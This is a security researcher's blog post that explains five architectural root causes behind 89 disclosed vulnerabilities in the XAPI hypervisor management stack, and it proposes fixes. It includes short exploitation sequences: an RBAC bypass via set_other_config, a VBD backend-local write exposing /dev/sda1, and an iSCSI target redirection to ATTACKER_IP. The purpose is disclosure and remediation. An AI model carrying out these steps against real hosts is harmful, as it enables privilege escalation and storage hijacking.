blog.moksha.dk

Personal blog by Jakob Wolffhechel

5 architectural root causes

Why 89 independently exploitable vulnerabilities exist in one management stack
Engineering analysis for remediation planning · Jakob Wolffhechel, Moksha

The landing page documents what the 89 vulnerabilities are. This page explains why they exist. Five architectural patterns in the XAPI codebase, each independently sufficient to produce exploitable findings, combine to create the attack surface documented in the full disclosure.

These are not five bugs. They are five classes of missing security engineering. Fixing any one class in isolation leaves the others exploitable. Complete remediation requires addressing all five.

1. Missing map_keys_roles on writable Map fields

XAPI's data model uses Map(String, String) fields on every major object type as extensible key-value stores. The RBAC system provides a mechanism called map_keys_roles to restrict write access to specific keys within these maps - for example, allowing vm-admin to write UI metadata keys while restricting infrastructure-critical keys to pool-admin.

The mechanism exists. It was never populated.

Across 8 XAPI object types and 18 writable map fields, the vast majority of map_keys_roles annotations are empty. Infrastructure-critical keys - keys that control storage backends, host device mounts, network bridge configuration, iSCSI target addresses, QEMU device parameters - are writable by the lowest delegated management role (vm-admin) with no per-key restriction.

The gap:

datamodel.ml field definition:
  field ~ty:(Map (String, String))
    ~map_keys_roles:[]     ← EMPTY - no per-key RBAC
    "other_config" "additional configuration"

Result: vm-admin can write any key via add_to_other_config

Scale of the gap

Object type	Field	map_keys_roles entries	Infrastructure keys writable by vm-admin
VBD	other_config	0	backend-local, backend-kind, owner, task_id
VDI	sm_config	0	vhd-parent, vdi_type, paused, activating
VM	other_config	3 (UI only)	is_system_domain, storage_driver_domain, mac_seed
VM	platform	0	hvm_serial, parallel, pci_emulation
VM	xenstore_data	0	FIST/, vm-data/ (unlimited)
VIF	other_config	0	promiscuous, mtu, ethtool-*
VDI	other_config	2 (UI only)	mem-pool, content_id, maps_to, leaf-coalesce
VDI	xenstore_data	0	All keys (unlimited)

Demonstrated by: MOKSHA-2026-0001 (BOC-1), MOKSHA-2026-0002 (SMC-1), MOKSHA-2026-0003 (VOC-1), and 60+ additional findings across all object types.

2. set_other_config RBAC bypass (ARCH-2)

Even where map_keys_roles entries exist, they are bypassable. The set_other_config method (and equivalents like set_sm_config, set_platform) replaces the entire map atomically. The XAPI RBAC engine checks the caller's permission to invoke the set_* method, but it does not check whether individual keys in the new map would require higher privileges under map_keys_roles.

The bypass:

1. Read current map: VM.get_other_config(vm) → {key1: val1, key2: val2}
2. Add protected key: map["is_system_domain"] = "true"
3. Write entire map: VM.set_other_config(vm, map)

map_keys_roles check: SKIPPED (set_* replaces atomically)
Role check: passes (vm-admin has permission to call set_other_config)

Result: protected key written despite map_keys_roles restriction

This means that adding map_keys_roles entries (Root Cause 1 fix) is necessary but not sufficient. Without also fixing the set_* bypass, every RBAC annotation can be circumvented by a caller who reads the current map, injects the protected key, and writes the whole map back.

Demonstrated by: MOKSHA-2026-0055 (VOC-5: set_other_config RBAC bypass for PCI passthrough key). Applies to all 18 map fields across all 8 object types.

3. No input validation at consumer code paths

Values written to map fields flow from the XAPI database to backend consumers - xenopsd, SM storage drivers, network scripts, blktap2, QEMU - without any validation at the consumption point. The consumer code assumes all values originate from a trusted source, but the API allows untrusted writes.

The flow (BOC-1 example):

1. vm-admin writes: VBD.add_to_other_config(vbd, "backend-local", "/dev/sda1")
2. XAPI stores value in database     ← no validation
3. On VM start, xapi_xenops.ml:backend_of_vbd reads the key
4. Value passed to xenopsd as VBD backend path     ← no validation
5. xenopsd writes path to xenstore
6. blkback opens /dev/sda1 in dom0     ← host root filesystem exposed

The flow (PDC-1 example):

1. pool-operator writes: SR.create(device_config={target: "ATTACKER_IP"})
2. PBD stored with attacker-controlled values ← no validation
3. On PBD.plug, BaseISCSI.load() reads device_config
4. iscsiadm -m discovery -t sendtargets -p ATTACKER_IP ← no validation
5. Hypervisor connects to attacker-controlled iSCSI target

The pattern repeats across every consumer: QEMU serial output (hvm_serial with file: prefix), NFS mount commands (server/serverpath), OVS bridge configuration (fail_mode), ionice scheduling (class/sched), tapdisk memory pools (mem-pool). In every case, the value written by the API caller is passed directly to a privileged operation without sanitisation.

Demonstrated by: MOKSHA-2026-0001 (BOC-1: host device mount), MOKSHA-2026-0004 (PDC-1: iSCSI target redirection), MOKSHA-2026-0009 (PLAT-6: QEMU serial host filesystem write), MOKSHA-2026-0005 (PDC-2: NFS server redirection).

4. No security-level logging on sensitive writes

When a vm-admin writes backend-local=/dev/sda1 to a VBD - the single API call that grants root-equivalent access to the hypervisor host - XAPI produces a warn-level log message: "Using local override for VBD backend." No security alert. No RBAC denial event. No anomaly trigger. The message is buried in the general XAPI log alongside routine operational noise.

This is not a logging gap on an obscure code path. This is the only indicator that the most critical vulnerability in the audit (CVSS 9.9) has been exploited. And it is a warning, not an error.

The pattern extends across the codebase:

SM driver operations triggered by injected sm_config values produce standard storage log messages indistinguishable from normal I/O
PBD.device_config modifications that redirect storage connections generate no log entry at the XAPI layer
Network configuration changes via Network.other_config produce no OVS-specific security event
Xenstore writes via VM.xenstore_data are not logged at all

An operator with access to every log on the system cannot reliably distinguish a BOC-1 exploitation from a normal VM start operation. Post-compromise forensics depends entirely on the attacker not cleaning up the backend-local key after use - which requires one additional API call.

Demonstrated by: MOKSHA-2026-0001 (BOC-1: warn-level only). The detection rules (74 across 5 categories) exist specifically because the native logging does not provide the signals needed to detect exploitation.

5. Transitive trust in device_config and SM driver parameters

Storage connection parameters - iSCSI target addresses, NFS server hostnames, CHAP credentials, block device paths, mount options - flow from the XAPI database through SM drivers to kernel-level storage operations. The SM drivers treat all values from PBD.device_config and VDI.sm_config as trusted input from an administrator.

This trust assumption is incorrect. The XAPI API allows pool-operator (and, via BOC-1, vm-admin) to write arbitrary values into these fields. The SM driver code - BaseISCSI.py, NFSSR.py, blktap2.py - has no independent validation layer. It reads the database value and passes it to iscsiadm, mount.nfs, or tap-ctl as a subprocess argument.

The trust chain:

XAPI database (untrusted writes allowed)
  ↓
SM driver (reads values, assumes trusted)     ← no independent validation
  ↓
Subprocess call (iscsiadm / mount.nfs / tap-ctl)
  ↓
Kernel storage operation (iSCSI login / NFS mount / block device open)

The hypervisor becomes a proxy for attacker-controlled storage commands.
Traffic is indistinguishable from normal storage I/O at the array.

This is why SMC-1 and PDC-1/PDC-2 are classified as multi-vendor findings. The hypervisor silently forwards attacker-controlled commands to storage arrays that have no way to distinguish them from legitimate operations. NetApp, Dell EMC, Pure Storage, HPE, and any other storage vendor connected to an XAPI-managed host are in the transitive blast radius - not because their products are vulnerable, but because the hypervisor they trust to send valid commands does not validate those commands.

Demonstrated by: MOKSHA-2026-0002 (SMC-1: storage protocol injection), MOKSHA-2026-0004 (PDC-1: iSCSI target redirection), MOKSHA-2026-0005 (PDC-2: NFS server redirection), MOKSHA-2026-0024 (PDC-3: NFS mount option injection).

Remediation scope

Addressing all 89 findings requires fixing all five root causes. The fixes are not architecturally invasive:

Root cause	Fix	Scope
1. Missing map_keys_roles	Populate annotations in `datamodel.ml`	~50 lines of OCaml across 18 field definitions
2. set_* RBAC bypass	Diff old/new map, check per-key roles on changed keys	~30 lines in `message_forwarding.ml`
3. No consumer validation	Add validation at each consumption point	~100 lines across 6 consumer modules
4. No security logging	Elevate to security-level log, add structured events	~20 lines per consumer
5. Transitive trust	Add input validation in SM drivers before subprocess calls	~50 lines per driver (BaseISCSI, NFSSR, blktap2)

The complete upstream patch set is approximately 200 lines of OCaml. The fix is not an architectural rewrite. It is the input validation that should have been written when the fields were first defined.

19 formal patch proposals covering all 5 root causes are documented in the research repository.

Jakob Wolffhechel · Moksha · Copenhagen · jakob@wolffhechel.dk · +45 3170 7337 · Advisories